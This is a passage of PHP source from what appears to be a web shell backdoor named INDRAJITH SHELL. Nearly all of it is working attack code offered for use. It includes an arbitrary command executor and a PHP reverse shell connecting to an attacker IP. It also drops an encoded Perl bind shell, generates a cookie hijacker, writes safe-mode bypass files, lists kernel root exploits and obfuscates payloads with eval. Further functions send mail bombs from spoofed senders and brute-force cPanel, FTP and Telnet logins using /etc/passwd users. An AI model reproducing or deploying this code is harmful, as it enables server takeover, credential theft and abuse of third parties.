  633.         if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name']))
  634.         {
  635.             alert("Succeded");
  636.         }
  637.         else
  638.         {
  639.             alert("Access Denied");
  640.         }
  641.     }
  642. }
  643. function ch_perm_bg()
  644. {
  645.     if(isset($_GET['p_filex']) && isset($_GET['new_perm']))
  646.     {
  647.         if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE)
  648.         {
  649.             alert("Succeded. Permission Changed!!!");
  650.         }
  651.         else
  652.         {
  653.             alert("Access Denied for This Operation");
  654.         }
  655.     }
  656. }
  657. function ch_perm_ui()
  658. {
  659.     $p_file=$_GET['perm'];
  660.     echo "<div id =result><center><h2>New Permission</h2><hr /><p><form method='GET'><input type='hidden' name='path' value=".getcwd()." ><input name='p_filex' type=hidden value={$p_file} >New Permission : <input name='new_perm' isze='40' value=0".substr(sprintf('%o', fileperms($p_file)), -3)."><input type='submit' value='   >>   ' /></form></p><p>Full Access : <font color=red>755</font><br />Notice : <font color=red>Don't use Unix Access like 777, 666, etc. Use 755, 655, etc</p><br /><br /><hr /><br /><br /></center></div>";
  661.     ch_perm_bg();
  662. }
  663. function mk_file_ui()
  664. {
  665.     chdir($_GET['path']);
  666.     echo "<div id=result><br /><br /><font color=red><form method='GET'>
  667.          <input type='hidden' name='path' value=".getcwd().">
  668.          New File Name : <input size='40' name='new_f_name' value=".$_GET['new_file']."></font><br /><br /><hr /><br /><center>
  669.          <textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr />
  670.          <input class='input_big' type='submit' value='  Save  ' /></form></center></div>";
  671. }
  672. function mk_file_bg()
  673. {
  674.     chdir($_GET['path']);
  675.     $c_path=$_GET['path'];
  676.     $c_file=$_GET['new_f_name'];
  677.     $c_file_contents=$_GET['n_file_content'];
  678.     $handle=fopen($c_file, "w");
  679.     if(!$handle)
  680.     {
  681.         alert("Permission Denied");
  682.     }
  683.     else
  684.     {
  685.         fwrite($handle,$c_file_contents);
  686.         alert("Your changes were Successfully Saved!");
  687.     }
  688.     fclose($handle);
  689. }
  690. function create_dir()
  691. {
  692.     chdir($_GET['path']);
  693.     $new_dir=$_GET['new_dir'];
  694.     if(is_writable($_GET['path']))
  695.     {
  696.         mkdir($new_dir);
  697.         alert("Direcory Created Successfully");
  698.         exit;
  699.     }
  700.     else
  701.     {
  702.         alert("Access Denied for this Operation");
  703.         exit;
  704.     }
  705. }
  706. function cmd($cmd)
  707. {
  708.     chdir($_GET['path']);
  709.     $res="";
  710.     if($_GET['cmdexe'])
  711.     {
  712.         $cmd=$_GET['cmdexe'];
  713.     }
  714.     if(function_exists('shell_exec'))
  715.     {
  716.         $res=shell_exec($cmd);
  717.     }
  718.     else if(function_exists('exec'))
  719.     {
  720.         exec($cmd,$res);
  721.         $res=join("\n",$res);
  722.     }
  723.     else if(function_exists('system'))
  724.     {
  725.         ob_start();
  726.         system($cmd);
  727.         $res = ob_get_contents();
  728.         ob_end_clean();  
  729.     }
  730.     elseif(function_exists('passthru'))
  731.     {
  732.     ob_start();
  733.     passthru($cmd);
  734.     $res=ob_get_contents();
  735.     ob_end_clean();
  736.     }
  737.     else if(function_exists('proc_open'))
  738.     {
  739.         $descriptorspec = array(0 => array("pipe", "r"),  1 => array("pipe", "w"),  2 => array("pipe", "w"));
  740.         $handle = proc_open($cmd ,$descriptorspec , $pipes);
  741.         if(is_resource($handle))
  742.         {
  743.             if(function_exists('fread') && function_exists('feof'))
  744.             {
  745.                 while(!feof($pipes[1]))
  746.                 {
  747.                     $res .= fread($pipes[1], 512);
  748.                 }
  749.             }
  750.             else if(function_exists('fgets') && function_exists('feof'))
  751.             {
  752.                 while(!feof($pipes[1]))
  753.                 {
  754.                     $res .= fgets($pipes[1],512);
  755.                 }
  756.             }
  757.         }
  758.         pclose($handle);
  759.     }
  760.    
  761.     else if(function_exists('popen'))
  762.     {
  763.         $handle = popen($cmd , "r");
  764.         if(is_resource($handle))
  765.         {
  766.             if(function_exists('fread') && function_exists('feof'))
  767.             {
  768.                 while(!feof($handle))
  769.                 {
  770.                     $res .= fread($handle, 512);
  771.                 }
  772.             }
  773.             else if(function_exists('fgets') && function_exists('feof'))
  774.             {
  775.                 while(!feof($handle))
  776.                 {
  777.                     $res .= fgets($handle,512);
  778.                 }
  779.             }
  780.         }
  781.         pclose($handle);
  782.     }
  783.    
  784.     $res=wordwrap(htmlspecialchars($res));
  785.     if($_GET['cmdexe'])
  786.     {
  787.         echo "<div id=result><center><font color=green><h2>r00t@TOF:~#</h2></center><hr /><pre>".$res."</font></pre></div>";
  788.     }
  789.     return $res;
  790. }
  791. function upload_file()
  792. {
  793.     chdir($_POST['path']);
  794.     if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name']))
  795.     {
  796.         alert("Uploaded File Successfully");
  797.     }
  798.     else
  799.     {
  800.         alert("Access Denied!!!");
  801.     }
  802. }
  803.  
  804. function reverse_conn_ui()
  805. {
  806.     global $your_ip;
  807.     echo "<div id='result'>
  808.          <center><h2>Reverse Shell</h2><hr />
  809.          <br /><br /><form method='GET'><table class=tbl>
  810.          <tr>
  811.          <td><select name='rev_option' style='color:green; background-color:black; border:1px solid #666;'>
  812.                      <option>PHP Reverse Shell</option>
  813.                      <option>PERL Bind Shell</option>
  814.          </select></td></tr><tr>
  815.          <td>Your IP : <input name='my_ip' value=".$your_ip.">
  816.          PORT : <input name='my_port' value='560'>
  817.          <input type='submit' value='   >>   ' /></td></tr></form>
  818.          <tr></tr>
  819.          <tr><td><font color=red>PHP Reverse Shell</font> : <font color=green> nc -l -p <i>port</i></font></td></tr><tr><td><font color=red>PERL Bind Shell</font> : <font color=green> nc <i>server_ip port</i></font></td></tr></table> </div>";
  820. }
  821. function reverse_conn_bg()
  822. {
  823.     global $os;
  824.     $option=$_REQUEST['rev_option'];
  825.     $ip=$_GET['my_ip'];
  826.     $port=$_GET['my_port'];
  827.     if($option=="PHP Reverse Shell")
  828.     {
  829.         echo "<div id=result><h2>RESULT</h2><hr /><br />";
  830.         function printit ($string)
  831.         {
  832.             if (!$daemon)
  833.             {
  834.         print "$string\n";
  835.             }
  836.         }
  837.         $chunk_size = 1400;
  838.         $write_a = null;
  839.         $error_a = null;
  840.         $shell = 'uname -a; w; id; /bin/sh -i';
  841.         $daemon = 0;
  842.         $debug = 0;
  843.         if (function_exists('pcntl_fork'))
  844.         {
  845.             $pid = pcntl_fork();
  846.             if ($pid == -1)
  847.             {
  848.         printit("ERROR: Can't fork");
  849.         exit(1);
  850.             }
  851.             if ($pid)
  852.             {
  853.         exit(0);
  854.             }
  855.             if (posix_setsid() == -1)
  856.             {
  857.         printit("Error: Can't setsid()");
  858.         exit(1);
  859.             }
  860.             $daemon = 1;
  861.         }
  862.         else
  863.         {
  864.             printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  865.         }
  866.         chdir("/");
  867.         umask(0);
  868.         $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  869.         if (!$sock)
  870.         {
  871.             printit("$errstr ($errno)");
  872.             exit(1);
  873.         }
  874.         $descriptorspec = array(0 => array("pipe", "r"),  1 => array("pipe", "w"),  2 => array("pipe", "w"));
  875.         $process = proc_open($shell, $descriptorspec, $pipes);
  876.         if (!is_resource($process))
  877.         {
  878.             printit("ERROR: Can't spawn shell");
  879.             exit(1);
  880.         }
  881.         stream_set_blocking($pipes[0], 0);
  882.         stream_set_blocking($pipes[1], 0);
  883.         stream_set_blocking($pipes[2], 0);
  884.         stream_set_blocking($sock, 0);
  885.         printit("<font color=green>Successfully opened reverse shell to $ip:$port </font>");
  886.         while (1)
  887.         {
  888.             if (feof($sock))
  889.             {
  890.         printit("ERROR: Shell connection terminated");
  891.         break;
  892.             }
  893.             if (feof($pipes[1]))
  894.             {
  895.         printit("ERROR: Shell process terminated");
  896.         break;
  897.             }
  898.             $read_a = array($sock, $pipes[1], $pipes[2]);
  899.             $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  900.             if (in_array($sock, $read_a))
  901.             {
  902.         if ($debug) printit("SOCK READ");
  903.         $input = fread($sock, $chunk_size);
  904.         if ($debug) printit("SOCK: $input");
  905.         fwrite($pipes[0], $input);
  906.             }
  907.             if (in_array($pipes[1], $read_a))
  908.             {
  909.         if ($debug) printit("STDOUT READ");
  910.         $input = fread($pipes[1], $chunk_size);
  911.         if ($debug) printit("STDOUT: $input");
  912.         fwrite($sock, $input);
  913.             }
  914.             if (in_array($pipes[2], $read_a))
  915.             {
  916.         if ($debug) printit("STDERR READ");
  917.         $input = fread($pipes[2], $chunk_size);
  918.         if ($debug) printit("STDERR: $input");
  919.         fwrite($sock, $input);
  920.             }
  921.         }
  922.         fclose($sock);
  923.         fclose($pipes[0]);
  924.         fclose($pipes[1]);
  925.         fclose($pipes[2]);
  926.         proc_close($process);
  927.         echo "<br /><br /><hr /><br /><br /></div>";
  928.     }
  929.     else if($option=="PERL Bind Shell")
  930.     {
  931.         global $bind_perl, $os;
  932.         $pbfl=$bind_perl;
  933.         $handlr=fopen("indrajith_perl_bind.pl", "wb");
  934.         if($handlr)
  935.         {
  936.             fwrite($handlr, gzinflate(base64_decode($bind_perl)));
  937.         }
  938.         else
  939.         {
  940.             alert("Access Denied for create new file");
  941.         }
  942.         fclose($handlr);
  943.         if(file_exists("indrajith_perl_bind.pl"))
  944.         {
  945.             if($os=="nix")
  946.             {
  947.                 cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl $port");
  948.             }
  949.             else
  950.             {
  951.                 cmd("perl indrajith_perl_bind.pl $port");
  952.             }
  953.         }
  954.     }
  955. }
  956.  
  957. function cookie_jack()
  958. {
  959.     global $cookie_highjacker;
  960.     echo "<div id=result><center><h2>NOTICE</h2><hr/>";
  961.     if(function_exists('fopen') && function_exists('fwrite'))
  962.     {
  963.         $cook=gzinflate(base64_decode($cookie_highjacker));
  964.         $han_le=fopen("jith_cookie.php", "w+");
  965.         if($han_le)
  966.         {
  967.             fwrite($han_le, $cook);
  968.             echo "Yes... Cookie highjacker is generated.<br /> Name : <a style='color:green;' target=_blank href=jith_cookie.php>jith_cookie.php</a></font>.<br /> Rename it as 404.php or what you like and highjack cookie of your target.<br />It is usefull in XSS<br />It will make a file <font color=red>configuration.txt</font> in this direcory and save the cookie value in it. :p cheers...<br /><br /><hr /><br /><br /></center></div>";
  969.         }
  970.         else
  971.         {
  972.             echo "<font color=red>Sorry... Generate COOKIE HIGHJACKER failed<br /><br /><hr /><br /><br /></center></div>";
  973.         }
  974.     }
  975. }
  976.  
  977.  
  978.  
  979. function safe_mode_fuck()
  980. {
  981.     global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php;
  982.     $path = chdir($_GET['path']);
  983.     chdir($_GET['path']);
  984.     switch($_GET['safe_mode'])
  985.     {
  986.         case "s_php_ini":
  987.             $s_file=$s_php_ini;
  988.             $s_name="php.ini";
  989.             break;
  990.         case "s_htaccess":
  991.             $s_name=".htaccess";
  992.             $s_file=$s_htaccess;
  993.             break;
  994.         case "s_htaccess_pl":
  995.             $s_name=".htaccess";
  996.             $s_file=$s_htaccess_pl;
  997.             break;
  998.         case "s_ini_php":
  999.             $s_name="ini.php";
  1000.             $s_file=$ini_php;
  1001.             break;
  1002.            
  1003.     }
  1004.     if(function_exists('fopen')&& function_exists('fwrite'))
  1005.     {
  1006.         $s_handle=fopen("$s_name", "w+");
  1007.         if($s_handle)
  1008.         {
  1009.             fwrite($s_handle, $s_file);
  1010.             alert("Operation Succeed!!!");
  1011.         }
  1012.         else
  1013.         {
  1014.             alert("Access Denied!!!");
  1015.         }
  1016.         fclose($s_handle);
  1017.     }
  1018. }
  1019. function safe_mode_fuck_ui()
  1020. {
  1021.     global $path;
  1022.     $path=getcwd();
  1023.     echo "<div id=result><br /><center><h2>Select Your Options</h2><hr />
  1024.    <table class=tbl size=10><tr><td><a href=?path={$path}&amp;safe_mode=s_php_ini>PHP.INI</a></td><td><a href=?path={$path}&amp;safe_mode=s_htaccess>.HTACCESS</a></td><td><a href=?path={$path}&amp;safe_mode=s_htaccess_pl>.HTACCESS(perl)</td><td><a href=?path={$path}&amp;safe_mode=s_ini_php>INI.PHP</td></tr></table><br /><br /></div>";
  1025. }
  1026.  
  1027.  
  1028. function AccessDenied()
  1029. {
  1030.     global $path, $forbid_dir;
  1031.     $path=$_GET['path'];
  1032.     chdir($path);
  1033.     if(function_exists('fopen') && function_exists('fwrite'))
  1034.     {
  1035.         $forbid=fopen(".htaccess", "wb");
  1036.         if($forbid)
  1037.         {
  1038.             fwrite($forbid, $forbid_dir);
  1039.             alert("Opreation Succeeded");
  1040.         }
  1041.         else
  1042.         {
  1043.             alert("Access Denied");
  1044.         }
  1045.         fclose($forbid);
  1046.     }
  1047. }
  1048.  
  1049. function r00t_exploit()
  1050. {
  1051.     $kernel = php_uname();
  1052.     $r00t_db = array('2.6.19'=>'jessica','2.6.20'=>'jessica','2.6.21'=>'jessica','2.6.22'=>'jessica','2.6.23'=>'jessica, vmsplice','2.6.24'=>'jessica, vmspice','2.6.31'=>'enlightment','2.6.18'=>'brk, ptrace, kmod, brk2','2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip,ptrace');
  1053.     foreach($r00t_db as $kern=>$exp)
  1054.     {
  1055.         if(strstr($kernel, $kern))
  1056.         {
  1057.             return $exp;
  1058.         }
  1059.     else
  1060.         {
  1061.             $exp='<font color="red">Not found.</font>';
  1062.             return $exp;
  1063.         }
  1064.     }
  1065. }
  1066.  
  1067. function php_ende_ui()
  1068. {
  1069.     echo "<div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr /><form method='post'><table class=tbl>
  1070.    <tr><td>
  1071.    Method : <select name='typed' style='color:green; background-color:black; border:1px solid #666;'><option>Encode</option><option>Decode</decode></select> TYPE : <select name='typenc' style='color:green; background-color:black; border:1px solid #666;'><option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>
  1072.    </td><tr><td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'>INPUT YOUR CONTENT TO ENCODE/DECODE
  1073.  
  1074. For Encode Input your full source code.
  1075.  
  1076. For Decode Input the encoded part only.</textarea></tr></td></table><hr /><input class='input_big' type='submit' value='   >>   ' /><br /><hr /><br /><br /></form></div>";
  1077. }
  1078. function php_ende_bg()
  1079. {
  1080.     $meth_d=$_POST['typed'];
  1081.     $typ_d=$_POST['typenc'];
  1082.     $c_ntent=$_POST['php_content'];
  1083.     $c_ntent=$c_ntent;
  1084.     switch($meth_d)
  1085.     {
  1086.         case "Encode":
  1087.             switch($typ_d)
  1088.             {
  1089.                 case "GZINFLATE":
  1090.                     $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1091.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
  1092.                     break;
  1093.                 case "GZUNCOMPRESS":
  1094.                     $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1095.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
  1096.                     break;
  1097.                 case "STR_ROT13":
  1098.                     $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>');
  1099.                     $res_t=base64_encode(str_rot13($res_t));
  1100.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
  1101.                     break;                  
  1102.             }
  1103.         break;
  1104.         case "Decode":
  1105.             switch($typ_d)
  1106.             {
  1107.                 case "GZINFLATE":
  1108.                     $res_t=gzinflate(base64_decode($c_ntent));
  1109.                     break;
  1110.                 case "GZUNCOMPRESS":
  1111.                     $res_t=gzuncompress(base64_decode($c_ntent));
  1112.                     break;
  1113.                 case "STR_ROT13":
  1114.                     $res_t=str_rot13(base64_decode($c_ntent));
  1115.                     break;                  
  1116.             }
  1117.         break;
  1118.     }
  1119.     echo "<div id=result><center><h2>INDRAJITH SHELL</h2><hr /><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";
  1120. }
  1121.  
  1122. function massmailer_ui()
  1123. {
  1124.     echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr /><table class=tbl width=40 style='col-width:40'><td><table class=tbl><tr style='float:left;'><td><font color=green size=4>Mass Mail</font></td></tr><form method='POST'><tr style='float:left;'><td> FROM : </td><td><input name='from' size=40 value='[email protected]'></td></tr><tr  style='float:left;'><td>TO :</td><td><input size=40 name='to_mail' value='[email protected],[email protected]'></td></tr><tr  style='float:left;'><td>Subject :</td><td><input size=40 name='subject_mail' value='Hi, GuyZ'></td></tr><tr style='float:left;'><td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing massmail :p</textarea></td><td><input class='input_big' type='submit' value='   >>   '></td></tr></form></table></td>
  1125.    <form method='post'><td> <table class='tbl'><td><font color=green size=4>Mail Bomber</font></td></tr><tr style='float:left;'><td>TO : </td><td><input size=40 name='bomb_to' value='[email protected],[email protected]'></td></tr><tr style='float:left;'><td>Subject : </td><td><input size=40 name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'><td>No. of times</td><td><input size=40 name='bomb_no' value='100'></td></tr><tr style='float:left;'><td> <textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content'>I'm doing  E-Mail Bombing :p</textarea> </td><td><input class='input_big' type='submit' value='   >>   '></td></tr></form></table>   </td></tr></table>";
  1126. }
  1127.  
  1128. function massmailer_bg()
  1129. {
  1130.     $from=$_POST['from'];
  1131.     $to=$_POST['to_mail'];
  1132.     $subject=$_POST['subject_mail'];
  1133.     $message=$_POST['mail_content'];
  1134.     if(function_exists('mail'))
  1135.     {
  1136.         if(mail($to,$subject,$message,"From:$from"))
  1137.         {
  1138.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Send... :p</font><br /><br /><hr /><br /><br />";
  1139.         }
  1140.         else
  1141.         {
  1142.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1143.         }
  1144.     }
  1145.     else
  1146.     {
  1147.         echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1148.     }
  1149. }
  1150.  
  1151. function mailbomb_bg()
  1152. {
  1153.     $rand=rand(0, 9999999);
  1154.     $to=$_POST['bomb_to'];
  1155.     $from="president_$rand@whitewhitehouse.gov";
  1156.     $subject=$_POST['bomb_subject']." ID ".$rand;
  1157.     $times=$_POST['bomb_no'];
  1158.     $content=$_POST['bmail_content'];
  1159.     if($times=='')
  1160.     {
  1161.         $times=1000;
  1162.     }
  1163.     while($times--)
  1164.     {
  1165.         if(function_exists('mail'))
  1166.         {
  1167.             if(mail($to,$subject,$message,"From:$from"))
  1168.             {
  1169.                 echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Bombed... :p</font><br /><br /><hr /><br /><br />";
  1170.             }
  1171.             else
  1172.             {
  1173.                 echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1174.             }
  1175.         }
  1176.         else
  1177.         {
  1178.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1179.         }
  1180.     }
  1181. }
  1182.  
  1183.  
  1184. /* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/
  1185. /*------------------------ Credit Goes to Them ---------------------------------*/
  1186. function cpanel_check($host,$user,$pass,$timeout)
  1187. {
  1188.     set_time_limit(0);
  1189.     global $cpanel_port;
  1190.     $ch = curl_init();
  1191.     curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
  1192.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1193.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1194.     curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1195.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1196.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1197.     $data = curl_exec($ch);
  1198.     if ( curl_errno($ch) == 28 )
  1199.     {
  1200.         print "<b><font color=orange>Error :</font> <font color=red>Connection Timeout. Please Check The Target Hostname .</font></b>";
  1201.         exit;
  1202.     }
  1203.     else if (curl_errno($ch) == 0 )
  1204.     {
  1205.         print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"orange\">[~]</font></b><font face=\"Tahoma\"   style=\"font-size: 9pt\"><b><font color=\"green\">
  1206.        Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  1207.     }
  1208.     curl_close($ch);
  1209. }
  1210.  
  1211. function cpanel_crack()
  1212. {
  1213.     set_time_limit(0);
  1214.     global $os;
  1215.     echo "<div id=result>";
  1216.     $cpanel_port="2082";
  1217.         $connect_timeout=5;
  1218.         if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype']))
  1219.         {
  1220.         ?>
  1221.         <center>
  1222.         <form method=post>
  1223.         <table class=tbl>
  1224.             <tr>
  1225.                 <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
  1226.             </tr>
  1227.             <tr>
  1228.                 <td align=center>User names</td><td align=center>Password</td>
  1229.             </tr>
  1230.             <tr>
  1231.                 <td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php
  1232.                 if($os != "win")
  1233.                 {
  1234.                     if(@file('/etc/passwd'))
  1235.                     {
  1236.                         $users = file('/etc/passwd');
  1237.                         foreach($users as $user)
  1238.                         {
  1239.                             $user = explode(':', $user);
  1240.                             echo $user[0] . "\n";
  1241.                         }
  1242.                     }
  1243.                     else
  1244.                     {
  1245.                         $temp = "";
  1246.                         $val1 = 0;
  1247.                         $val2 = 1000;
  1248.                         for(;$val1 <= $val2;$val1++)
  1249.                         {
  1250.                             $uid = @posix_getpwuid($val1);
  1251.                             if ($uid)
  1252.                                  $temp .= join(':',$uid)."\n";
  1253.                          }
  1254.                        
  1255.                          $temp = trim($temp);
  1256.                              
  1257.                          if($file5 = fopen("test.txt","w"))
  1258.                          {
  1259.                             fputs($file5,$temp);
  1260.                              fclose($file5);
  1261.                              
  1262.                              $file = fopen("test.txt", "r");
  1263.                              while(!feof($file))
  1264.                              {
  1265.                                 $s = fgets($file);
  1266.                                 $matches = array();
  1267.                                 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1268.                                 $matches = str_replace("home/","",$matches[1]);
  1269.                                 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1270.                                     continue;
  1271.                                 echo $matches;
  1272.                             }
  1273.                             fclose($file);
  1274.                         }
  1275.                     }
  1276.                 }
  1277.                  ?></textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td>
  1278.             </tr>
  1279.             <tr>
  1280.                 <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
  1281.             </tr>
  1282.             <tr>
  1283.                 <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
  1284.             </tr>
  1285.             <tr>
  1286.                 <td align=center colspan=2><input type="submit" value="   Go    " class=but></td>
  1287.             </tr>
  1288.         </table>
  1289.         </form>
  1290.         </center>
  1291.         <?php
  1292.         }
  1293.         else
  1294.         {
  1295.             if(empty($_POST['username']) || empty($_POST['password']))
  1296.                 echo "<center>Please Enter The Users or Password List</center>";
  1297.             else
  1298.             {
  1299.                 $userlist=explode("\n",$_POST['username']);
  1300.                 $passlist=explode("\n",$_POST['password']);
  1301.    
  1302.                 if($_POST['cracktype'] == "ftp")
  1303.                 {
  1304.                     foreach ($userlist as $user)
  1305.                     {
  1306.                         $pureuser = trim($user);
  1307.                         foreach ($passlist as $password )
  1308.                         {
  1309.                             $purepass = trim($password);
  1310.                             ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1311.                         }
  1312.                     }
  1313.                 }
  1314.                 if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
  1315.                 {
  1316.                     if($cracktype == "telnet")
  1317.                     {
  1318.                         $cpanel_port="23";
  1319.                     }
  1320.                     else
  1321.                         $cpanel_port="2082";
  1322.                     foreach ($userlist as $user)
  1323.                     {
  1324.                         $pureuser = trim($user);
  1325.                         echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
  1326.                         Processing user $pureuser ...</font></b><br><br>";
  1327.                         foreach ($passlist as $password )
  1328.                         {
  1329.                             $purepass = trim($password);
  1330.                             cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1331.                         }
  1332.                     }
  1333.                 }
  1334.             }
  1335.         }
  1336.                
  1337.     echo "</div>";
  1338. }
  1339.  
  1340. function get_users()
  1341. {
  1342.     $userz = array();
  1343.     $user = file("/etc/passwd");
  1344.     foreach($user as $userx=>$usersz)
  1345.     {
  1346.             $userct = explode(":",$usersz);
  1347.             array_push($userz,$userct[0]);
  1348.     }
  1349.     if(!$user)
  1350.     {
  1351.         if($opd = opendir("/home/"))
  1352.         {
  1353.             while(($file = readdir($opd))!== false)
  1354.             {
  1355.                 array_push($userz,$file);
  1356.             }
  1357.         }
  1358.         closedir($opd);
  1359.     }
  1360.     $userz=implode(', ',$userz);
  1361.     return $userz;
  1362. }
  1363.  
  1364. function exploit_details()
  1365. {
  1366.     global $os;
  1367.     echo "<div id=result style='color:green;'><center>
  1368.    <h2>Exploit Server Details</h2><hr /><br /><br /><table class=table style='color:green;text-align:center'><tr><td>
  1369.    OS: <a style='color:7171C6;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr>
  1370.    <tr><td>PHP Version : <a style='color:7171C6;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr>
  1371.    <tr><td>Kernel Release : <font color=7171C6>".php_uname(r)."</font></td></tr>
  1372.    <tr><td>Kernel Version : <font color=7171C6>".php_uname(v)."</font></td></td>
  1373.    <tr><td>Machine : <font color=7171C6>".php_uname(m)."</font></td</tr>
  1374.    <tr><td>Server Software : <font color=7171C6>".$_SERVER['SERVER_SOFTWARE']."</font></td</tr><tr>";
  1375.     if(function_exists('apache_get_modules'))
  1376.     {
  1377.     echo "<tr><td style='text-align:left;'>Loaded Apache modules : <br /><br /><font color=7171C6>";
  1378.         echo implode(', ', apache_get_modules());
  1379.         echo "</font></tr></td>";
  1380.     }
  1381.     if($os=='win')
  1382.     {
  1383.         echo  "<tr><td style='text-align:left;'>Account Setting : <font color=7171C6><pre>".cmd('net accounts')."</pre></td></tr>
